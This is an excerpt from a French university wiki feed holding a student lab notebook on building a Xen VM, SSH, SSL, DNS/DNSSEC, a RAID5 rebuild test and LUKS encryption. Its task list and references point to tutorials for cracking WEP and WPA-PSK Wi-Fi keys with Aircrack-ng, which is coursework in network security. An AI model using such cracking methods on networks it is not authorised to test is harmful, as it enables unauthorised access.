&amp;lt;pre&amp;gt;[work]&lt;br /&gt;
exten=&amp;gt;_6XXX,1,Dial(SIP/${EXTEN},20)&lt;br /&gt;
exten =&amp;gt; _6XXX,2,Hangup()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:voipjjld.jpg|thumb|center|Appel entre 2 smartphones]]&lt;br /&gt;
&lt;br /&gt;
== Références ==&lt;br /&gt;
&lt;br /&gt;
* Crackage de la clef WEP : [http://wiki.backtrack-fr.net/index.php/Casser_une_cl%C3%A9_wep/wpa_avec_la_suite_Aircrack-ng]&lt;br /&gt;
* Cassage de mot de passe WPA-PSK : [http://www.crack-wifi.com/tutoriel-crack-wpa.php]&lt;br /&gt;
* Cryptage de données : [https://doc.ubuntu-fr.org/cryptsetup]&lt;br /&gt;
* DHCP : [https://doc.ubuntu-fr.org/isc-dhcp-server]&lt;br /&gt;
* Asterisk : [http://denisrosenkranz.com/tuto-installer-et-configurer-asterisk-sous-debian-6-et-ubuntu/]&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46346</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46346"/>
				<updated>2017-11-17T13:42:22Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
 ../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANe.conf&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
